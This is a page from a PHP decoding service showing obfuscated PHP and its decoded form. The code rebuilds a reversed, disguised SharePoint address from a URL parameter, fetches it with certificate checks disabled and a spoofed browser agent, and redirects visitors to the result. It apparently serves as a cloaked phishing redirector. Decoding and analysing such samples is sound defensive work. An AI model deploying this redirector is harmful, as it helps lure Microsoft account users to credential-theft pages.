Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto qVRF6; k0eyr: $links = $links2 . $links1; goto Mkkb1; MSR3t: $links2 = "\x68\x74\x74\..

Decoded Output download

<?  goto qVRF6; k0eyr: $links = $links2 . $links1; goto Mkkb1; MSR3t: $links2 = "https://"; goto k0eyr; kdJKG: curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"); goto tACDv; A_831: $links1 = str_replace("https://hls.play102.top/qSxwdc/EFbrgn/", '', $links1); goto OWcet; HkP_Y: $output = curl_exec($ch); goto yWtNl; Mkkb1: $ch = curl_init(); goto mGWAo; OWcet: $links1 = strrev($links1); goto d_vc5; aPvaK: curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); goto kdJKG; zSYI9: curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); goto eY4p9; mGWAo: curl_setopt($ch, CURLOPT_URL, $links); goto Ehue_; eY4p9: curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); goto IOYm7; feMCZ: $links1 = str_replace("/hOAThiEnCoT/", "_onmicrosoft_com/", $links1); goto MSR3t; tACDv: curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); goto zSYI9; qVRF6: if (isset($_GET["url"])) { $links1 = $_GET["url"]; } goto A_831; Ehue_: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto aPvaK; d_vc5: $links1 = str_replace("/tAYeuKEngOc/", "-my.sharepoint.com/:f:/g/personal/", $links1); goto feMCZ; IOYm7: curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); goto HkP_Y; yWtNl: curl_close($ch); goto TOCEH; TOCEH: echo $output; goto xCjuW; xCjuW: echo "<script>window.location.href = '{$output}';</script>"; ?>

Did this file decode correctly?

Original Code

goto qVRF6; k0eyr: $links = $links2 . $links1; goto Mkkb1; MSR3t: $links2 = "\x68\x74\x74\x70\x73\72\x2f\57"; goto k0eyr; kdJKG: curl_setopt($ch, CURLOPT_USERAGENT, "\x4d\x6f\172\151\x6c\154\141\x2f\65\56\60\x20\x28\x57\151\156\x64\157\167\163\x20\116\124\x20\x31\x30\56\x30\x3b\x20\x57\x69\x6e\66\64\73\x20\x78\66\x34\x29\x20\101\x70\x70\154\145\x57\145\142\113\151\x74\57\65\x33\x37\x2e\x33\66\40\x28\113\x48\x54\x4d\x4c\x2c\x20\x6c\151\153\145\x20\x47\x65\x63\153\157\x29\40\103\150\x72\x6f\155\145\x2f\x39\61\x2e\60\56\64\x34\67\62\x2e\61\x32\64\x20\x53\141\146\141\x72\151\x2f\x35\63\67\x2e\x33\x36"); goto tACDv; A_831: $links1 = str_replace("\x68\164\x74\160\x73\x3a\57\57\x68\x6c\x73\56\x70\154\141\171\x31\60\x32\x2e\x74\x6f\160\x2f\x71\123\x78\x77\x64\143\57\105\106\142\x72\x67\156\57", '', $links1); goto OWcet; HkP_Y: $output = curl_exec($ch); goto yWtNl; Mkkb1: $ch = curl_init(); goto mGWAo; OWcet: $links1 = strrev($links1); goto d_vc5; aPvaK: curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); goto kdJKG; zSYI9: curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); goto eY4p9; mGWAo: curl_setopt($ch, CURLOPT_URL, $links); goto Ehue_; eY4p9: curl_setopt($ch, CURLOPT_COOKIEJAR, "\143\157\157\153\151\145\x2e\164\170\164"); goto IOYm7; feMCZ: $links1 = str_replace("\x2f\x68\x4f\101\124\x68\x69\105\156\103\157\x54\57", "\x5f\157\x6e\155\x69\x63\162\157\x73\157\146\x74\137\x63\157\155\x2f", $links1); goto MSR3t; tACDv: curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); goto zSYI9; qVRF6: if (isset($_GET["\165\x72\154"])) { $links1 = $_GET["\x75\x72\154"]; } goto A_831; Ehue_: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto aPvaK; d_vc5: $links1 = str_replace("\x2f\164\x41\x59\x65\x75\x4b\x45\x6e\x67\117\x63\57", "\55\155\x79\x2e\163\x68\141\x72\x65\160\x6f\151\x6e\164\x2e\x63\x6f\x6d\x2f\x3a\146\x3a\57\147\x2f\160\145\x72\x73\157\x6e\x61\x6c\57", $links1); goto feMCZ; IOYm7: curl_setopt($ch, CURLOPT_COOKIEFILE, "\143\157\x6f\x6b\x69\x65\56\x74\x78\164"); goto HkP_Y; yWtNl: curl_close($ch); goto TOCEH; TOCEH: echo $output; goto xCjuW; xCjuW: echo "\74\x73\x63\162\151\x70\x74\76\167\151\x6e\x64\157\x77\x2e\154\x6f\143\x61\164\x69\157\x6e\x2e\x68\162\x65\146\x20\75\x20\47{$output}\x27\73\74\57\163\x63\x72\151\160\x74\76";

Function Calls

None

Variables

None

Stats

MD5 206dbe2d47b4e8648eff88ee277cfba0
Eval Count 0
Decode Time 41 ms